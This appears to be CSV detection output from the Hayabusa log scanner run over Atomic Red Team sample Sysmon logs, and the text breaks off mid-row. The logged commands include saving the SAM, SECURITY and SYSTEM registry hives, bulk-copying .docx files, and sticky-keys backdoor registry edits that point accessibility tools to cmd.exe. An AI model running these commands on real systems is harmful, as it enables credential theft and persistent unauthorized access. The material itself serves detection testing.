""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security 
security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e 
.docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe 
/f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d 
C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.467 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network 
